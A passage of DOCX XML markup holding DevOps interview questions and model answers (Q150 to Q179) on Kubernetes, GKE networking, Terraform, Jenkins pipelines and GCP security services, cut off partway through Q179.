        <w:t>A: DevOps is a set of practices and a culture that combines software development and IT operations to shorten the delivery lifecycle and improve reliability, using automation, continuous integration/delivery, and shared ownership between developers and operations. It solves the classic problem of development and operations working in silos with conflicting incentives (dev wants to ship fast, ops wants stability), by making both teams jointly responsible for how software runs in production, backed by automation that makes fast and safe delivery possible simultaneously.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q150. Automation definition: What is automation in a DevOps context, and why does it matter?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Automation means replacing manual, repetitive operational tasks - provisioning infrastructure, running tests, deploying code, responding to routine alerts - with code and tooling that executes them consistently and reliably without human intervention. It matters because manual processes are slow, error-prone, and don't scale with team or system growth, while automation reduces toil, increases deployment frequency and consistency, and frees engineers to focus on higher-value work instead of repeating the same manual steps.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q151. Deployment vs DaemonSet: What is the difference between a Deployment and a DaemonSet in Kubernetes?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A Deployment manages a specified number of interchangeable pod replicas distributed across available nodes based on scheduling constraints, used for stateless, horizontally scalable applications. A DaemonSet ensures exactly one pod runs on every node (or a selected subset via node selectors) in the cluster, automatically adding a pod when a new node joins - used for node-level agents like log collectors, monitoring agents, or network plugins that need to run everywhere, not just wherever the scheduler decides to place them.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q152. ServiceAccount basics: What is a Kubernetes ServiceAccount, and how is it different from a regular user account?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A ServiceAccount is an identity that pods use to authenticate to the Kubernetes API server and, via Workload Identity, to external cloud services - it's how workloads (not humans) get permissions. A regular user account represents a human authenticating to the cluster (typically via an external identity provider), while a ServiceAccount is a Kubernetes-native object bound to specific pods, with its own RBAC permissions scoped to what that workload actually needs to do.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q153. Cluster slowness metrics: If a Kubernetes cluster feels slow, what metrics would you check first?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Check node-level resource pressure first (CPU/memory utilization and any pods being throttled or evicted), API server latency and request rate (a slow control plane makes everything feel sluggish, including `kubectl` commands), and etcd health since etcd performance directly affects API server responsiveness. Also check pending pod counts (indicating insufficient scheduling capacity) and cluster autoscaler activity, since a cluster struggling to add capacity fast enough under load is a common and specific cause of felt slowness.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q154. Explain your automation: You mention you have written automation scripts. Walk me through one you are proud of, end to end.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer picks one specific, concrete example - the problem it solved (a manual process that was slow or error-prone), the design decisions made (why Python over Bash, how errors and retries were handled, whether it had a dry-run mode), and the measurable impact (time saved, incidents prevented, adoption by the team). Being specific about the actual problem, the tradeoffs considered, and the real outcome is what separates a strong answer from a vague description of 'I wrote a script that automates X'.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q155. Scenario - Terraform locked state: Terraform apply is stuck because the state lock in GCS was not released after a crashed CI job. How would you safely unlock and verify state integrity?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: First confirm no other apply is genuinely running by checking the CI system and asking the team, since force-unlocking while a real apply is in flight is how you get real corruption. Once confirmed, use `terraform force-unlock &lt;lock-id&gt;` with the lock ID from the error message, then immediately run `terraform plan` before touching anything else to confirm state still matches reality and no partial resources were left in a half-applied state. Fix the root cause afterward - usually adding a CI timeout/cleanup step or a lock TTL - so a crashed job can't strand the lock again.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q156. Scenario - GKE OOMKilled pods: Pods in a GKE cluster keep restarting with OOMKilled after a traffic increase. How would you diagnose and fix it without just raising memory limits blindly?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Check `kubectl describe pod` for the OOMKilled reason and `kubectl top pod`/historical metrics in Cloud Monitoring to see actual memory usage trend versus the configured limit, and check whether the increase is a genuine per-request memory growth (e.g. a cache or connection pool growing unbounded) versus just more concurrent requests hitting a tight limit. If it's a leak or unbounded growth, profile the app (heap dump, memory profiler) and fix the code; if it's legitimate increased concurrency, right-size requests/limits based on real p99 usage and consider horizontal autoscaling instead of just inflating the per-pod limit, since that only delays the same failure at a higher traffic level.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q157. Scenario - Docker image bloat in CI: A CI pipeline's Docker build time doubled and the image grew from 300MB to 1.2GB after a dependency change. How would you find the cause and fix it?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Use `docker history` or `dive` on the image to see which layer added the size, and diff the dependency lockfile change to find what pulled in extra weight (a new package with heavy transitive dependencies, or a build tool that shouldn't ship in the final image). Fix it with a multi-stage build so build-only dependencies stay in the builder stage and only runtime artifacts are copied to the final stage, pin to slim/distroless base images where possible, and add a CI check that fails the build if image size regresses beyond a threshold so this doesn't silently recur.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q158. Scenario - GKE node pool stuck in NotReady: A GKE node pool shows several nodes stuck in NotReady after a Cluster Autoscaler scale-up. How would you triage and recover?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Check `kubectl describe node` for the NotReady condition reason (kubelet not posting status, network plugin not ready, or disk pressure), and check Cloud Logging for the node's serial console and kubelet logs to see if it's an image pull failure, a CNI/networking issue, or a quota/resource problem preventing the node from joining the cluster properly. If it's an isolated bad node, cordon and drain it and let the autoscaler replace it; if it's systemic across new nodes, check for a recent node image or network policy change and consider rolling back the node pool version while investigating, since letting the autoscaler keep adding broken nodes just wastes quota and delays recovery.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q159. Scenario - Terraform drift after manual fix: An on-call engineer manually edited a firewall rule in the GCP console during an incident, and now Terraform plan wants to revert it. How do you reconcile safely?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Do not let the next apply silently revert the incident fix - first understand whether the manual change should become the new desired state or was only a temporary mitigation. If it should be permanent, update the Terraform configuration to match the manual change and run plan again to confirm zero diff before merging; if it was temporary, plan a controlled apply to revert it outside of peak hours with the on-call engineer's sign-off. Either way, treat this as a process gap - add a post-incident action to require any console change made during an incident to be reflected in Terraform within a defined window, so drift doesn't accumulate silently.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q160. Scenario - Ingress cert expiry: Users report TLS warnings on a production GKE service after a cert-manager renewal failed silently. How would you find the root cause and prevent recurrence?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Check `kubectl describe certificate` and `kubectl describe certificaterequest` for the failure reason - commonly a DNS-01/HTTP-01 challenge failure, an expired or misconfigured ClusterIssuer, or a rate limit hit on the ACME provider. Rotate or fix the immediate cert manually if needed to restore service, then add monitoring on certificate expiry (a Prometheus metric or alert on `cert-manager` conditions) well before the actual expiry date so a failed renewal is caught days in advance instead of being discovered by users seeing browser warnings.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q161. Scenario - GCP quota outage: A batch job fails at 2am because a GCP compute quota was hit in one region. What immediate and long-term steps would you take?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Immediately check the Quotas page for the specific exhausted quota (CPUs, IP addresses, or a specific machine family) and either request an emergency quota increase through support or reschedule/shift the batch job to a region or zone with headroom if the workload allows it. Long term, set up quota utilization alerts well before the limit (e.g. at 80 percent) and either pre-request higher quotas for known growth or make the batch job quota-aware so it degrades gracefully (smaller batch size, queued retry) instead of hard failing at 2am with no one able to react quickly.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q162. Scenario - noisy neighbor on shared GKE cluster: One team's workload is starving CPU/network from other namespaces on a shared GKE cluster. How would you diagnose and fix it?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Confirm the pattern with per-namespace resource metrics in Cloud Monitoring or `kubectl top pod --all-namespaces`, and check whether the offending workload has requests/limits set at all - unbounded requests are the most common cause of one team crowding out others on a shared node pool. Enforce ResourceQuotas and LimitRanges per namespace so no team can request more than their fair share, use PriorityClasses so critical workloads preempt lower-priority ones under pressure, and consider node pool separation or Kubernetes NetworkPolicies plus bandwidth limits if the contention is network rather than CPU, so a fix in one namespace doesn't require guessing at other teams' expense.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q163. PVC with Deployments: Can a Kubernetes Deployment use a PersistentVolumeClaim, and what are the tradeoffs versus using one with a StatefulSet?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Yes, a Deployment can mount a PVC, but all replica Pods created by that Deployment share the exact same PVC (since Deployment Pods aren't given unique identities), so it only really works cleanly with ReadWriteMany volumes or a single-replica Deployment; with ReadWriteOnce storage, scaling beyond one replica causes Pods to fail to schedule or contend for the same volume. A StatefulSet instead uses a volumeClaimTemplate to provision a distinct PVC per replica (e.g., data-mysql-0, data-mysql-1), giving each Pod its own persistent identity and storage that survives rescheduling - which is what most databases and per-replica-state workloads actually need.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q164. Deployment vs StatefulSet for databases: If Deployments can also use PVCs, why do teams still prefer StatefulSets for running databases?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Databases need stable network identity, stable storage per replica, and ordered, predictable startup/shutdown - none of which Deployments guarantee. StatefulSet Pods get a fixed ordinal name and stable DNS (e.g., mysql-0.mysql-headless), each with its own PVC via volumeClaimTemplates, and are created/terminated in a strict sequential order, which matters for primary/replica election, cluster bootstrapping, and safe rolling upgrades. A Deployment's Pods are interchangeable and can be recreated in any order with new random names, which breaks assumptions that most stateful replication protocols rely on.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q165. StatefulSet scale-down order: What is the pod termination order when you scale down a StatefulSet, and why does that ordering matter for stateful workloads?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: StatefulSets terminate Pods in reverse ordinal order - the highest-numbered Pod goes first (e.g., scaling from 3 to 2 removes pod-2), and by default each Pod's termination completes before the next one starts. This ordered, one-at-a-time teardown protects workloads like Kafka, Elasticsearch, or Cassandra where removing multiple nodes simultaneously could break quorum, cause data loss, or leave the cluster in a split-brain state; it lets the workload's own rebalancing/replication catch up between removals.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q166. Container root access: How would you prevent processes inside a container from running as root?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Set a non-root user at the image level with a USER directive in the Dockerfile, and enforce it at the cluster level with a Pod securityContext/containerSecurityContext setting runAsNonRoot: true and a specific runAsUser/runAsGroup, plus allowPrivilegeEscalation: false and a read-only root filesystem where possible. To make this a hard guarantee rather than a convention, enforce it with an admission controller (Pod Security Admission 'restricted' profile, Gatekeeper, or Kyverno policy) so Pods that don't set runAsNonRoot are rejected at admission time instead of relying on every team remembering to set it.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q167. Cross-namespace pod communication: Can Pods in different Kubernetes namespaces communicate by default, and how would you restrict or allow it deliberately?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Yes - by default Kubernetes networking is flat and any Pod can reach any other Pod's IP across namespaces, since namespaces are an API/RBAC boundary, not a network boundary. To restrict this you apply NetworkPolicies (requires a CNI that enforces them, like Calico or GKE's Dataplane V2) that default-deny ingress in a namespace and then explicitly allow traffic from specific namespaces/labels via namespaceSelector and podSelector rules; to allow it deliberately across namespaces you typically expose a Service and reference it via its cluster-DNS name (service.namespace.svc.cluster.local) and permit that specific selector in the policy.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q168. Multi-stage CI/CD pipeline: Walk me through a multi-stage CI/CD pipeline you have built, stage by stage.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A typical pipeline I've run: checkout and static analysis (lint, unit tests, SAST) fails fast before anything expensive runs; a build stage compiles/builds a container image and tags it with the commit SHA; a scan stage runs image vulnerability scanning and blocks on critical CVEs; the image is pushed to Artifact Registry; a deploy-to-staging stage applies manifests (via Helm/Kustomize or Terraform) and runs integration/smoke tests against staging; and finally a gated production deploy stage - often manual approval plus canary or blue-green rollout - promotes the same immutable image/tag that was tested, with automated rollback wired to health checks or error-rate SLOs.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q169. Jenkins agent restriction: You have 5 Jenkins agents but only want a specific job to run on 2 of them. How would you configure that?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Label the two target agents with a shared custom label (e.g., 'deploy-prod') in each node's configuration, then in the job/pipeline specify agent { label 'deploy-prod' } (declarative) or node('deploy-prod') { ... } (scripted) so Jenkins' scheduler only assigns that job to nodes carrying that label. For more control - like limiting concurrency across the two - combine labels with the 'Restrict where this project can be run' field and throttle concurrent builds per label using the Throttle Concurrent Builds plugin or a lockable-resources block.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q170. Skip a Jenkins stage: A pipeline has Stage 0 through Stage 3. How would you configure it so Stage 1 can be skipped on demand?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: In a declarative pipeline, wrap Stage 1 in a when block driven by a parameter, e.g. a boolean build parameter SKIP_STAGE_1, and write when { expression { return !params.SKIP_STAGE_1 } } on that stage so it's conditionally skipped rather than removed from the file. Expose the parameter via parameters { booleanParam(name: 'SKIP_STAGE_1', defaultValue: false) } so it shows up as a checkbox on 'Build with Parameters', which lets whoever triggers the build decide at runtime whether Stage 1 runs, while Jenkins still records it as 'skipped' in the stage view rather than silently absent.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q171. GCP services experience: Which GCP services have you worked with hands-on, and in what capacity on each?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: This is a resume-deep-dive/behavioral question - answer it as a specific, structured inventory rather than a list: for each service, name what you built or owned (e.g., 'GKE - administered multi-tenant clusters, node pool sizing, upgrades, RBAC'; 'Terraform - wrote and maintained reusable modules for VPC/GKE/IAM across environments'; 'Cloud Storage/BigQuery - built data pipelines with lifecycle policies and IAM least-privilege'; 'Cloud Composer - orchestrated ETL DAGs'; 'Cloud Armor/Cloud NAT/Load Balancing - secured and exposed production services'). Interviewers are listening for depth and ownership signals, so pick 4-5 services you can go deep on rather than a shallow list of everything you've touched.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q172. GKE networking overview: Explain how networking works in GKE at a high level, from Pod IP allocation to external traffic.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Each GKE node gets a node IP from the VPC subnet, and each Pod gets its own IP from a secondary IP range (alias IP range) associated with that subnet, which is what makes GKE Pods natively routable inside the VPC without overlay networking (in VPC-native/alias-IP clusters, the default and recommended mode). Pod-to-Pod traffic on the same node goes through the local CNI bridge/eBPF datapath; Pod-to-Pod across nodes routes through the VPC using those alias IP ranges; Services get a stable ClusterIP that kube-proxy (or Dataplane V2/eBPF in newer clusters) load-balances to backing Pod IPs; and external traffic enters via a Service of type LoadBalancer or an Ingress, which provisions a GCP L4/L7 load balancer in front of the cluster.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q173. Pod-to-pod communication: How do Pods communicate with each other inside the same GKE cluster?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Every Pod gets a real, routable IP from the cluster's Pod CIDR (via VPC-native alias IP ranges), so Pods can talk directly Pod-IP-to-Pod-IP without NAT, the same as any two hosts on a flat network. In practice, most communication goes through a Service (ClusterIP) rather than raw Pod IPs, because Pod IPs are ephemeral - the Service provides a stable virtual IP and DNS name, and kube-proxy or the eBPF dataplane (Dataplane V2) load-balances requests across the current healthy backend Pods, so callers never need to track individual Pod IPs directly.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q174. Cross-namespace GKE networking: In GKE specifically, how does cross-namespace Pod communication work at the network layer, and how would a NetworkPolicy change that?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: At the network layer, namespaces don't segment traffic at all - GKE's flat Pod networking means any Pod can route to any other Pod's IP or Service regardless of namespace, exactly like same-namespace traffic. GKE enforces NetworkPolicy either through Calico (older dataplane) or natively through Dataplane V2 (eBPF-based), and once you apply a default-deny-ingress NetworkPolicy in a namespace, cross-namespace traffic is blocked unless you add an explicit allow rule using a namespaceSelector (matched by the target namespace's labels) combined with a podSelector, which is the standard way to permit only specific cross-namespace calls.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q175. Exposing GKE externally: How would you expose a GKE application to the internet, and what options would you choose between?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: The main options are a Service of type LoadBalancer (provisions an external L4 Network Load Balancer, simplest but no HTTP routing/TLS termination features), a GKE Ingress (provisions a GCP external HTTP(S) Application Load Balancer with host/path routing, managed TLS certs, and Cloud Armor integration), or the newer Gateway API (the more flexible, standardized replacement for Ingress with better multi-team/multi-cluster routing support). For a production HTTP service I'd default to Ingress/Gateway API fronted by Cloud Armor and a Google-managed SSL certificate, reserving a bare LoadBalancer Service for non-HTTP protocols that don't need L7 routing.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q176. Securing external URL: Once an application is exposed externally, how do you secure that public endpoint end to end?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Terminate TLS at the load balancer using a Google-managed certificate so traffic is encrypted in transit, and put Cloud Armor in front of it with rate limiting and WAF-style rules (SQLi/XSS preconfigured rules, geo-blocking, or bot protection as needed) to filter malicious traffic before it reaches the cluster. Behind that, apply Identity-Aware Proxy or your own auth layer for anything not meant to be fully public, restrict the backend Service/Ingress with NetworkPolicies so only the load balancer's traffic reaches the Pods, and keep logging/monitoring alerts wired up so you'd actually notice an attack in progress rather than just having controls that look good on paper.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q177. Cloud Armor purpose: What is the purpose of Cloud Armor, and what kinds of threats does it protect against?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Cloud Armor is Google Cloud's WAF and DDoS-protection service that sits in front of external HTTP(S) load balancers (and TCP/SSL proxy LBs) to filter traffic before it reaches your backends. It protects against volumetric and protocol DDoS attacks (leveraging Google's global network-edge scrubbing), OWASP-style application attacks (SQL injection, XSS, remote code execution) via preconfigured WAF rules, and lets you write custom rules to rate-limit, allow/deny by IP or geography, or block based on request attributes - all enforced at Google's edge, before traffic ever reaches your GKE cluster or VMs.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q178. Pod internet access: How does a Pod in a private GKE cluster reach the internet if it has no public IP?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: The Pod's traffic leaves the node using the node's internal IP as the source, hits the VPC's default route, and if a Cloud NAT gateway is configured on that subnet/region, the outbound packet gets its source IP translated to one of Cloud NAT's external IPs so it can reach the internet and receive the response - all without the Pod or node ever having a public IP itself. Without Cloud NAT (or a proxy/NAT VM doing the same job), a private-IP-only Pod simply has no path out to the internet, which is why Cloud NAT is a standard companion to private GKE clusters.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q179. Network flow Pod to Internet: Walk through the full network path from a Pod to the internet: Pod, Node, VPC, Cloud NAT, Internet.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
